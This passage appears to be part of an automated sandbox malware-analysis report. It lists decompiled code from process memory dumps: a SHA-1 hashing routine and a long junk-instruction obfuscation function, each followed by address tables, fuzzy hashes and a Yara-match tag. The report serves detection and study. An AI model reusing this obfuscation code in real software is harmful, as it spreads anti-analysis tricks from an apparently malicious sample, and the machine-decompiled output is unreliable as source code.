                                                        					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                        					_v16 = _t358;
                                                        					_t369 = _v12;
                                                        					_v12 = _t432;
                                                        					asm("rol edx, 0x5");
                                                        					_v8 = _t279;
                                                        					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                                        					asm("ror ecx, 0x2");
                                                        					_v16 = _v8;
                                                        					_t299 = _v12;
                                                        					_v8 = _t470;
                                                        					_v12 = _t434;
                                                        					asm("rol edx, 0x5");
                                                        					asm("ror eax, 0x2");
                                                        					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                                        					_v16 = _v8;
                                                        					_t437 = _t369;
                                                        					_t358 = _v12;
                                                        					_v8 = _t437;
                                                        					_v12 = _t522;
                                                        					asm("rol esi, 0x5");
                                                        					_v16 = _v8;
                                                        					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                        					_t404 = _t299;
                                                        					_t279 = _v12;
                                                        					asm("ror ecx, 0x2");
                                                        					_v12 = _t499;
                                                        					_t341 = _t340 + 5;
                                                        					_v8 = _t341;
                                                        				} while (_t341 < 0x3c);
                                                        				_t478 = 0x3c;
                                                        				_v8 = 0x3c;
                                                        				do {
                                                        					asm("rol esi, 0x5");
                                                        					_t479 = _v8;
                                                        					asm("ror eax, 0x2");
                                                        					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                                        					_t346 = _v12;
                                                        					_v16 = _t404;
                                                        					_v12 = _t525;
                                                        					asm("rol esi, 0x5");
                                                        					asm("ror ebx, 0x2");
                                                        					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                                        					_v16 = _t358;
                                                        					_t370 = _v12;
                                                        					_v12 = _t445;
                                                        					asm("rol edx, 0x5");
                                                        					_v16 = _t279;
                                                        					asm("ror ecx, 0x2");
                                                        					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                                        					_t404 = _v12;
                                                        					_v12 = _t303;
                                                        					asm("rol eax, 0x5");
                                                        					_v16 = _t346;
                                                        					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                        					_t305 = _t370;
                                                        					_v8 = _t346;
                                                        					asm("ror edx, 0x2");
                                                        					_v8 = _t370;
                                                        					_t358 = _v12;
                                                        					_v12 = _t532;
                                                        					asm("rol esi, 0x5");
                                                        					_t478 = _t479 + 5;
                                                        					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                                        					_v16 = _t305;
                                                        					_t279 = _v12;
                                                        					asm("ror ecx, 0x2");
                                                        					_v8 = _t404;
                                                        					_v12 = _t499;
                                                        					_v8 = _t478;
                                                        				} while (_t478 < 0x50);
                                                        				_t480 = _a4;
                                                        				_t480[2] = _t480[2] + _t358;
                                                        				_t480[3] = _t480[3] + _t404;
                                                        				_t311 = _t480[4] + _v16;
                                                        				 *_t480 =  *_t480 + _t499;
                                                        				_t480[1] = _t480[1] + _t279;
                                                        				_t480[4] = _t311;
                                                        				_t480[0x17] = 0;
                                                        				return _t311;
                                                        			}

                                                        0x0040a11b
                                                        0x0040a11e
                                                        0x0040a126
                                                        0x0040a134
                                                        0x0040a137
                                                        0x0040a13a
                                                        0x0040a13a
                                                        0x0040a141
                                                        0x0040a144
                                                        0x0040a147
                                                        0x0040a14f
                                                        0x0040a15d
                                                        0x0040a160
                                                        0x0040a167
                                                        0x0040a16a
                                                        0x0040a16d
                                                        0x0040a170
                                                        0x0040a173
                                                        0x0040a17c
                                                        0x0040a183
                                                        0x0040a183
                                                        0x0040a189
                                                        0x0040a1a2
                                                        0x0040a1a5
                                                        0x0040a1ac
                                                        0x0040a1af
                                                        0x0040a1b2
                                                        0x0040a1c4
                                                        0x0040a1ce
                                                        0x0040a1d1
                                                        0x0040a1da
                                                        0x0040a1dd
                                                        0x0040a1e4
                                                        0x0040a1e7
                                                        0x0040a1ed
                                                        0x0040a200
                                                        0x0040a207
                                                        0x0040a20a
                                                        0x0040a20d
                                                        0x0040a210
                                                        0x0040a219
                                                        0x0040a21c
                                                        0x0040a22f
                                                        0x0040a232
                                                        0x0040a23c
                                                        0x0040a23f
                                                        0x0040a241
                                                        0x0040a24a
                                                        0x0040a24d
                                                        0x0040a260
                                                        0x0040a266
                                                        0x0040a269
                                                        0x0040a270
                                                        0x0040a272
                                                        0x0040a275
                                                        0x0040a278
                                                        0x0040a27b
                                                        0x0040a27e
                                                        0x0040a281
                                                        0x0040a28a
                                                        0x0040a28f
                                                        0x0040a292
                                                        0x0040a292
                                                        0x0040a2a5
                                                        0x0040a2a8
                                                        0x0040a2ab
                                                        0x0040a2b2
                                                        0x0040a2b5
                                                        0x0040a2b8
                                                        0x0040a2bb
                                                        0x0040a2ce
                                                        0x0040a2d1
                                                        0x0040a2dc
                                                        0x0040a2df
                                                        0x0040a2eb
                                                        0x0040a2ee
                                                        0x0040a2f4
                                                        0x0040a2f7
                                                        0x0040a2fa
                                                        0x0040a301
                                                        0x0040a311
                                                        0x0040a314
                                                        0x0040a31a
                                                        0x0040a31d
                                                        0x0040a324
                                                        0x0040a326
                                                        0x0040a329
                                                        0x0040a32c
                                                        0x0040a32f
                                                        0x0040a332
                                                        0x0040a339
                                                        0x0040a348
                                                        0x0040a34b
                                                        0x0040a352
                                                        0x0040a355
                                                        0x0040a358
                                                        0x0040a35b
                                                        0x0040a35e
                                                        0x0040a361
                                                        0x0040a364
                                                        0x0040a36d
                                                        0x0040a37e
                                                        0x0040a386
                                                        0x0040a38c
                                                        0x0040a38f
                                                        0x0040a391
                                                        0x0040a394
                                                        0x0040a397
                                                        0x0040a3a4

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction ID: 5e5443ef098d349f7e33f9aecf6f08398bbbeee53fd6575e54cb3400f46edf1b
                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction Fuzzy Hash: C7021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E0041DB34() {
                                                        				void* _t47;
                                                        				signed int _t48;
                                                        				void* _t49;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        
                                                        				 *0x83e375da =  *0x83e375da << 0xe6;
                                                        				asm("ror dword [0xe961c38f], 0x12");
                                                        				_t48 = _t47 - 0xa;
                                                        				_t51 = _t49;
                                                        				if(( *0xb59dc181 & 0x3839676d) <= 0) {
                                                        					__edx =  *0x8af817f * 0x1d61;
                                                        					asm("rcr dword [0x6f963b83], 0xee");
                                                        					__cl =  *0xe711fce3;
                                                        					asm("sbb esp, [0x63374ad5]");
                                                        					_push( *0x431a49f1);
                                                        					__edi = __edi + 1;
                                                        					__esi = __esi ^  *0x36282f3;
                                                        					 *0x14cba318 =  *0x14cba318 << 0x59;
                                                        					__ebx = __ebx +  *0x248ba70d;
                                                        					__ch = __ch & 0x000000a0;
                                                        					_pop(__esi);
                                                        					 *0x2a99e713 =  *0x2a99e713 << 0xbc;
                                                        					asm("adc edx, 0x985d478e");
                                                        					__edx = 1 +  *0x8af817f * 0x1d61;
                                                        					__edi = __edi - 1;
                                                        					asm("rol byte [0xc26a50e7], 0x86");
                                                        					 *0xc8b71865 =  *0xc8b71865 + __eax;
                                                        					__eax = __eax +  *0xbc6442e;
                                                        					asm("adc edx, [0xfa22c129]");
                                                        					__esp =  *0x6af946b * 0xd1d2;
                                                        					 *0x1ef4ec0c =  *0x1ef4ec0c << 0x27;
                                                        					__esp =  *0x6af946b * 0x0000d1d2 |  *0x5b777126;
                                                        					asm("rcl dword [0x737f9c94], 0xed");
                                                        					 *0x297a07e7 =  *0x297a07e7 | __ah;
                                                        					 *0xfaa96823 = __ecx;
                                                        					 *0x12c91698 =  *0x12c91698 - __eax;
                                                        					asm("adc edi, [0x96c35121]");
                                                        					__ecx =  *0x4ba9a9f7;
                                                        					if(__eax >=  *0x22ec4dde) {
                                                        						asm("adc esp, 0x89bc8270");
                                                        						__esp = __esp |  *0xb92856d5;
                                                        						asm("sbb [0xdc7b8311], esp");
                                                        						_pop(__esi);
                                                        						__edi = 0xd70eaed4;
                                                        						 *0x3873b7b9 =  *0x3873b7b9 << 0xc4;
                                                        						 *0x1cdb1ccb =  *0x1cdb1ccb << 0xaf;
                                                        						_t13 = __edx;
                                                        						__edx =  *0x1a48f9f3;
                                                        						 *0x1a48f9f3 = _t13;
                                                        						asm("rol dword [0xc73655c1], 0xaa");
                                                        						_pop(__ecx);
                                                        						if(( *0xfb0958d & __eax) == 0) {
                                                        							__ecx = __ecx | 0x6d322d7a;
                                                        							 *0x4b7adf08 =  *0x4b7adf08 >> 0xe;
                                                        							__ebx = __ebx - 1;
                                                        							asm("sbb edx, [0xc92bef9f]");
                                                        							 *0x39d02110 = __bl;
                                                        							 *0xeed84607 =  *0xeed84607 << 0x3a;
                                                        							asm("adc [0x23784310], al");
                                                        							 *0x46af86b1 =  *0x46af86b1 << 0x91;
                                                        							__esp = __esp ^  *0x54d32268;
                                                        							_push( *0xc836dfb9);
                                                        							asm("sbb [0x613cf9dd], ecx");
                                                        							__esp = 0xc6ed21;
                                                        							__bl = __bl + 0x28;
                                                        							asm("rcr dword [0xea69db2f], 0xc");
                                                        							__esp =  *0x7677dd21;
                                                        							 *0xa75730f2 =  *0xa75730f2 & __dh;
                                                        							_pop(__edx);
                                                        							_t16 = __dl;
                                                        							__dl =  *0x9f550400;
                                                        							 *0x9f550400 = _t16;
                                                        							__dh = __dh ^  *0xef345138;
                                                        							 *0xbb025df6 =  *0xbb025df6 | __dl;
                                                        							__ebp = __ebp & 0xa898f789;
                                                        							_push( *0xf4203761);
                                                        							__al = __al -  *0x6151f2b4;
                                                        							 *0x2bab1564 =  *0x2bab1564 >> 0xfb;
                                                        							__ebx = __ebx &  *0x344a4f91;
                                                        							__al = __al ^ 0x0000002a;
                                                        							asm("adc edx, 0x583b8e26");
                                                        							asm("rcl byte [0x39604186], 0x69");
                                                        							__al =  *0x699d3ae1;
                                                        							 *0xe8090bf2 =  *0xe8090bf2 << 0xb0;
                                                        							_push( *0x47b78867);
                                                        							__esi = __esi + 0x250e02f5;
                                                        							__esp =  *0x7677dd21 -  *0x612741eb;
                                                        							 *0x7702e0cc =  *0x7702e0cc << 0x33;
                                                        							__ebp = 0x14f2af9d;
                                                        							if( *0x7702e0cc > 0) {
                                                        								__eax =  *0x2d7e117e * 0xcf40;
                                                        								__edi = 0xf014a90b;
                                                        								 *0xa3c99ae1 =  *0xa3c99ae1 & __dh;
                                                        								__edi = 0xddf8548e;
                                                        								__esp = __esp & 0x90f719cb;
                                                        								__ebx = __ebx -  *0xcf0ca321;
                                                        								_push(__esi);
                                                        								asm("sbb edi, [0x1c6dd7f7]");
                                                        								asm("rol dword [0x7e6e1c1b], 0xf9");
                                                        								L1();
                                                        								__edx = __edx +  *0x5d2a92e8;
                                                        								__eax = 1 +  *0x2d7e117e * 0xcf40;
                                                        								__ecx = __ecx &  *0x9c0b2916;
                                                        								if(__ecx == 0) {
                                                        									__esp = __esp +  *0x43803775;
                                                        									asm("lodsb");
                                                        									__edx = __eax;
                                                        									 *0x377ef599 =  *0x377ef599 ^ __esp;
                                                        									_pop( *0xd22a4cd4);
                                                        									__edx = __edx + 1;
                                                        									__esi = __esi + 0x56caa2fa;
                                                        									asm("adc [0x1ea6c3e4], dl");
                                                        									__esp = __esp + 1;
                                                        									__ebx = __ebx - 0xb106a8bb;
                                                        									 *0xecd18b9d =  *0xecd18b9d << 0x15;
                                                        									 *0x86a8dd9e =  *0x86a8dd9e >> 0x74;
                                                        									__ebx = __ebx + 1;
                                                        									__ah = __ah +  *0x7bdfd408;
                                                        									asm("sbb ah, 0x84");
                                                        									 *0xfce480e2 =  *0xfce480e2 & __dh;
                                                        									asm("adc ebp, [0x100b430f]");
                                                        									__ebp = 0x14f2af9e;
                                                        									 *0x8a898f8c =  *0x8a898f8c - 0x14f2af9d;
                                                        									__eax = __eax + 0x1159c533;
                                                        									 *0xd91384a2 =  *0xd91384a2 + __cl;
                                                        									asm("sbb [0x90ebb91e], esi");
                                                        									 *0xb1e82c18 =  *0xb1e82c18 >> 0x2f;
                                                        									__eax = __eax - 1;
                                                        									asm("adc edx, 0xcb9bb025");
                                                        									__edi = 0xc97fa9d;
                                                        									asm("adc ecx, [0x8a58b03d]");
                                                        									asm("adc esi, 0x6ad0642b");
                                                        									asm("sbb ebp, [0x5d85f413]");
                                                        									__esp = __esp |  *0x94d300f5;
                                                        									__edi = 0x17b355b6;
                                                        									asm("ror byte [0x2c76ff63], 0x95");
                                                        									if(0xddf8548e < 0) {
                                                        										 *0xf53e7573 =  *0xf53e7573 + __ecx;
                                                        										__edx = __edx & 0xd93f80cc;
                                                        										if(__edx <= 0) {
                                                        											__eax =  *0x59ad2a7f * 0x7f11;
                                                        											_pop(__ebx);
                                                        											0x17b355b7 =  *0x73497860 * 0xd105;
                                                        											asm("sbb ah, 0xe3");
                                                        											asm("sbb [0xfcba317], edx");
                                                        											asm("ror byte [0x49c0c738], 0x5a");
                                                        											 *0x459b2680 = __dl;
                                                        											 *0x8a89976e =  *0x8a89976e & __ecx;
                                                        											_pop( *0x1759c533);
                                                        											asm("adc edi, 0x8e4562dd");
                                                        											 *0x80f94d22 =  *0x80f94d22 ^ __al;
                                                        											if( *0x80f94d22 >= 0) {
                                                        												 *0x8f372f72 =  *0x8f372f72 << 5;
                                                        												__esp =  *0xb832631d;
                                                        												__esi = __esi ^  *0xdf2b881;
                                                        												__edi =  *0x9d4c3f67;
                                                        												asm("adc edx, [0xfd64f719]");
                                                        												 *0xae1e6103 = __ecx;
                                                        												 *0xd3581012 =  *0xd3581012 >> 0x53;
                                                        												asm("sbb [0x369443c8], esi");
                                                        												__eax = __eax ^  *0x79f53192;
                                                        												__ebx = __ebx +  *0x6faf0331;
                                                        												__dl = __dl & 0x00000004;
                                                        												_push(__esi);
                                                        												__edi =  *0x9d4c3f67 + 0x8efa5c21;
                                                        												__ebp = 0x14f2af9d;
                                                        												if(0x14f2af9d == 0) {
                                                        													__esp = __esp |  *0x8a899475;
                                                        													asm("sbb [0xea55f83b], esp");
                                                        													__edx = __edx - 1;
                                                        													__edi =  *0x36f36c15;
                                                        													asm("adc esi, [0x478a98f7]");
                                                        													 *0xce4cbcd5 =  *0xce4cbcd5 - __edx;
                                                        													__eax = __eax;
                                                        													if( *0xce4cbcd5 >= 0) {
                                                        														__edx =  *0xf0d127c * 0x8f18;
                                                        														_t19 = __ah;
                                                        														__ah =  *0x9411100a;
                                                        														 *0x9411100a = _t19;
                                                        														__esi = __esi - 1;
                                                        														__eax = __eax ^ 0x41118e65;
                                                        														__ebp = 0x5f3bc887;
                                                        														asm("adc [0x46faf03], edx");
                                                        														asm("rcr dword [0xc0371d68], 0xea");
                                                        														asm("ror byte [0x5224d122], 0x4e");
                                                        														__ah =  *0x9411100a ^  *0x5609c12;
                                                        														__ch = 0x8a;
                                                        														__ecx = __ecx &  *0xfdab3d95;
                                                        														__esi = __esi &  *0x14b0c705;
                                                        														asm("ror byte [0xb29d682c], 0x99");
                                                        														 *0x550fc834 =  *0x550fc834 << 0xf2;
                                                        														asm("adc esp, [0x6705781f]");
                                                        														__ecx = __ecx + 1;
                                                        														asm("rol dword [0xb609270d], 0x48");
                                                        														_pop(__ecx);
                                                        														asm("lodsd");
                                                        														 *0xa80aa833 =  *0xa80aa833 >> 0xe6;
                                                        														if( *0xa80aa833 == 0) {
                                                        															 *0xdedbaacf =  *0xdedbaacf ^ __eax;
                                                        															asm("sbb [0x7910af89], esi");
                                                        															_t26 = __esi;
                                                        															__esi =  *0x3800c0f3;
                                                        															 *0x3800c0f3 = _t26;
                                                        															__ebx = __ebx + 0xc1bf29d1;
                                                        															__esi =  *0x3800c0f3 | 0xf1112513;
                                                        															asm("sbb edi, [0x12680c8e]");
                                                        															__ecx = __ecx &  *0x777ced6f;
                                                        															 *0x2da875cf =  *0x2da875cf | 0x3839676d;
                                                        															if( *0x2da875cf < 0) {
                                                        																__esp = __esp -  *0x9a458b79;
                                                        																__edx = __edx ^ 0xf67eb667;
                                                        																__al = __al & 0x00000010;
                                                        																__eax = __eax - 1;
                                                        																 *0xaf8b65f9 =  *0xaf8b65f9 << 0x2f;
                                                        																 *0x7cde3a10 =  *0x7cde3a10 >> 0x91;
                                                        																__eax = __eax &  *0x955bca92;
                                                        																if(__eax < 0) {
                                                        																	__eax = __eax ^ 0x337df271;
                                                        																	__ecx = __ecx & 0x046faf03;
                                                        																	__dl =  *0x7fe385b7;
                                                        																	asm("adc edi, 0x25fb87d4");
                                                        																	asm("rcl dword [0xe051a0eb], 0x6a");
                                                        																	if(0x14f2af9d >=  *0x5fd91868) {
                                                        																		__ebx = __ebx +  *0x79925572;
                                                        																		__ebx = __ebx |  *0xbc53efbd;
                                                        																		 *0xd187351d =  *0xd187351d | __edx;
                                                        																		if( *0xd187351d >= 0) {
                                                        																			 *0x538cd570 =  *0x538cd570 + 0x3839676d;
                                                        																			_pop( *0xb10488d6);
                                                        																			asm("adc ah, 0xc6");
                                                        																			 *0xfca1f418 =  *0xfca1f418 >> 0xae;
                                                        																			if(( *0x3df3ff80 & __bl) < 0) {
                                                        																				asm("adc eax, 0xda75d579");
                                                        																				 *0xd32b91a1 =  *0xd32b91a1 - __edx;
                                                        																				asm("sbb ebp, [0x72d34164]");
                                                        																				_pop(__edi);
                                                        																				 *0xefbb6a10 =  *0xefbb6a10 & __al;
                                                        																				_push(0x3839676d);
                                                        																				 *0x10472dbc =  *0x10472dbc + __edx;
                                                        																				 *0x19677a0 =  *0x19677a0 - __ah;
                                                        																				 *0x4079396c =  *0x4079396c << 0xf6;
                                                        																				asm("sbb [0x3377ce6], bh");
                                                        																				asm("scasd");
                                                        																				__esp = __esp &  *0x1568046f;
                                                        																				asm("ror dword [0x7926379e], 0xc2");
                                                        																				asm("stosb");
                                                        																				__edx = __edx |  *0x211b883b;
                                                        																				 *0xbb50c599 =  *0xbb50c599 & __esi;
                                                        																				if( *0xbb50c599 <= 0) {
                                                        																					_t35 = __esi;
                                                        																					__esi =  *0x8a30680b;
                                                        																					 *0x8a30680b = _t35;
                                                        																					_t36 = __edi;
                                                        																					__edi =  *0x59072dfe;
                                                        																					 *0x59072dfe = _t36;
                                                        																					__edi =  *0x59072dfe +  *0xaf9074f5;
                                                        																					if(( *0xf9a7e316 & 0x3839676d) == 0) {
                                                        																						__esi = __esi ^  *0xcf8de17b;
                                                        																						__edi = __edi | 0xa70b6565;
                                                        																						__ebp =  *0x91a8eb13;
                                                        																						 *0x91a8eb13 = 0x5f3bc887;
                                                        																						__eax =  *0x813ed53d;
                                                        																						__ebx = __ebx |  *0x11b94b85;
                                                        																						 *0xcb0d83b5 =  *0xcb0d83b5 >> 0x4a;
                                                        																						asm("sbb [0xb0db1700], al");
                                                        																						__eax =  *0x813ed53d - 1;
                                                        																						__ebx = __ebx & 0xcb9bb025;
                                                        																						asm("sbb edi, 0x61cf2ace");
                                                        																						__ebp =  *0x66c1160b;
                                                        																						 *0xf32988b7 =  *0xf32988b7 << 0x67;
                                                        																						__ebx = __ebx + 0x85f61b68;
                                                        																						asm("adc eax, 0xc32ff78c");
                                                        																						asm("ror dword [0x20a2df2b], 0x3d");
                                                        																						asm("adc eax, [0x1b565fc0]");
                                                        																						__eax =  *0x813ed53d - 0x00000001 &  *0xb4eab039;
                                                        																						__edi = __edi &  *0xade012ce;
                                                        																						__esp = __esp & 0x8d530ec8;
                                                        																						 *0xcffd0d93 = __ecx;
                                                        																						__esi = __esi |  *0x9505ac2d;
                                                        																						__ebx = 0x6df3b7f8;
                                                        																						__al = __al - 0x20;
                                                        																						asm("lodsd");
                                                        																						asm("rcr byte [0x1a900c12], 0x57");
                                                        																						if(__al == 0) {
                                                        																							__eax = __eax + 0x56a53575;
                                                        																							__esp = __esp ^  *0x6162a4c5;
                                                        																							 *0x87416e7 =  *0x87416e7 & __ah;
                                                        																							 *0xfa7458d4 =  *0xfa7458d4 + __esi;
                                                        																							__edx = 0x85e32062;
                                                        																							asm("ror byte [0xc3bc1a86], 0xe3");
                                                        																							 *0xab94324 = __dh;
                                                        																							__esp = __edi;
                                                        																							__ecx = __ecx +  *0x6812f919;
                                                        																							__edx = 0xffffffff85e32061;
                                                        																							_pop( *0x46104981);
                                                        																							_t42 = __esp;
                                                        																							__esp =  *0x7b1d9217;
                                                        																							 *0x7b1d9217 = _t42;
                                                        																							__esi = __esi - 1;
                                                        																							__ebx = 0x6df3b7f7;
                                                        																							__ebp =  *0xe5f92a6a * 0x30b3;
                                                        																							__cl = __cl & 0x000000e2;
                                                        																							 *0xb832f466 =  *0xb832f466 +  *0x10f2b881;
                                                        																							__ecx = 0x2371d7a9;
                                                        																							asm("sbb cl, [0xaf03e2ca]");
                                                        																							__eax =  *0xb832f466 +  *0x10f2b881 ^ 0x1168046f;
                                                        																							asm("rol byte [0x23dbd61a], 0x94");
                                                        																							__ebx =  *0x4d850760 * 0x1254;
                                                        																							 *0xdd52648b =  *0xdd52648b + 0x2371d7a9;
                                                        																							__edi = __edi ^  *0xacba315;
                                                        																							asm("rol byte [0x832755d0], 0xe2");
                                                        																							_t45 = __al;
                                                        																							__al =  *0x77e0ee0a;
                                                        																							 *0x77e0ee0a = _t45;
                                                        																							__edi = __edi ^  *0x110c4629;
                                                        																							asm("sbb ecx, [0x6e0b148b]");
                                                        																							__edi = __edi & 0x85346939;
                                                        																							_push(0x19e7a3a3);
                                                        																							__ebx =  *0x4d850760 * 0x1254 -  *0xb1220f81;
                                                        																							__esi = __esi &  *0xd10c8fed;
                                                        																							__bl = 0x14;
                                                        																							__ecx = 0x2371d7aa;
                                                        																							_push( *0x5a3016bc);
                                                        																							 *0xa94247f3 =  *0xa94247f3 &  *0xe5f92a6a * 0x000030b3;
                                                        																							__edi = 0x2371d7a9;
                                                        																							 *0xafda63a0 =  *0xafda63a0 << 0xe3;
                                                        																							__ch = 0x0000008a &  *0x9066e6e6;
                                                        																							asm("scasd");
                                                        																							__esp =  *0x7b1d9217 +  *0xd500860f;
                                                        																							__edx = 0xffffffff9b779450;
                                                        																							__al =  *0x77e0ee0a ^  *0x899399b1;
                                                        																							__esi = __esi & 0x79bffa13;
                                                        																							__edi = __edi & 0x8316763d;
                                                        																							__ebx =  *0x4d850760 * 0x1254 -  *0xb1220f81 + 1;
                                                        																							asm("ror dword [0x417c44be], 0x8b");
                                                        																						}
                                                        																					}
                                                        																				}
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				L1:
                                                        				_t52 = _t52 - 0x3c;
                                                        				 *0xb05f328 =  *0xb05f328 << 0x70;
                                                        				_t48 = _t48 | 0x669ab5f1;
                                                        				_t51 = _t51 -  *0xcae98fd5;
                                                        				asm("rol dword [0xda01d43f], 0xd");
                                                        				goto L1;
                                                        			}








                                                        0x0041e26f
                                                        0x0041e275
                                                        0x0041e27b
                                                        0x0041e281
                                                        0x0041e286
                                                        0x0041e28c
                                                        0x0041e292
                                                        0x0041e294
                                                        0x0041e29b
                                                        0x0041e2a1
                                                        0x0041e2a8
                                                        0x0041e2af
                                                        0x0041e2b6
                                                        0x0041e2bc
                                                        0x0041e2bd
                                                        0x0041e2c3
                                                        0x0041e2c9
                                                        0x0041e2d5
                                                        0x0041e2db
                                                        0x0041e2e1
                                                        0x0041e2e2
                                                        0x0041e2e2
                                                        0x0041e1c1
                                                        0x0041e125
                                                        0x0041e101
                                                        0x0041e0a8
                                                        0x0041e086
                                                        0x0041e068
                                                        0x0041e03e
                                                        0x0041e009
                                                        0x0041dfc7
                                                        0x0041df40
                                                        0x0041df13
                                                        0x0041debe
                                                        0x0041de68
                                                        0x0041de56
                                                        0x0041dda7
                                                        0x0041dd54
                                                        0x0041dc82
                                                        0x0041dc3b
                                                        0x0041d5a6
                                                        0x0041d5ac
                                                        0x0041d5b9
                                                        0x0041d5c0
                                                        0x0041d5c5
                                                        0x0041d5d1
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: mg98
                                                        • API String ID: 0-2199263299
                                                        • Opcode ID: 6d954f35d0d324459baac13d570150beda56d28667a150ebecd2492e2b1a5518
                                                        • Instruction ID: 1a6027264feb0a224148f04c2d95060ac072e89897748af391c65c7b3ac92a18
                                                        • Opcode Fuzzy Hash: 6d954f35d0d324459baac13d570150beda56d28667a150ebecd2492e2b1a5518
                                                        • Instruction Fuzzy Hash: 881299B3809791CFE711DF38D98AB413FB1F396324B08424EC8A197592D73825A6DF89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: c624ca358866dfc8cdd850b06327819dfaafa3dc827846df238a24fdcffba0d2
                                                        • Instruction ID: 19a2b4fbc5b94c48415de0d0b74fcd624b955bc2c6fe5187c2c9bcd9ab41a5ba
                                                        • Opcode Fuzzy Hash: c624ca358866dfc8cdd850b06327819dfaafa3dc827846df238a24fdcffba0d2
                                                        • Instruction Fuzzy Hash: 4DD14531D0421ADBDF28CF99C586ABEBBF1FF09304F6480EAD43AA6651D7709A41DB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 6ff89ffd02ed3fa40b3e4c85325d106985f30b795af7060e5ca379a6d83ed0dc
                                                        • Instruction ID: 319b8dbbc3600b03ad7ac5d581d075bea6618a3777e1a5e65fd8f3efd6d088c7
                                                        • Opcode Fuzzy Hash: 6ff89ffd02ed3fa40b3e4c85325d106985f30b795af7060e5ca379a6d83ed0dc
                                                        • Instruction Fuzzy Hash: 38A1C271A146497ADF29EEA0CC81BFE36E5EF49300F0400EAF946DA1E1CA758D94DB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                        • Instruction ID: 3019bf139f3a331da8b7861d5f321214583b01b44ad9c2d424a1a38e3cafaddb
                                                        • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                        • Instruction Fuzzy Hash: BE81ED33E141149BDF28CE6DC890A7D77E1EB96320F1582ADD936AB2C6D770AD41CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79c842ff115746f421f27fa1ff69aa9dfa9a290199830f0e4c8d710c8fdb2e1b
                                                        • Instruction ID: 4f36f6ace43fa0190173f0af2aec162b2c924a9bd83f6463cb64ebd147523379
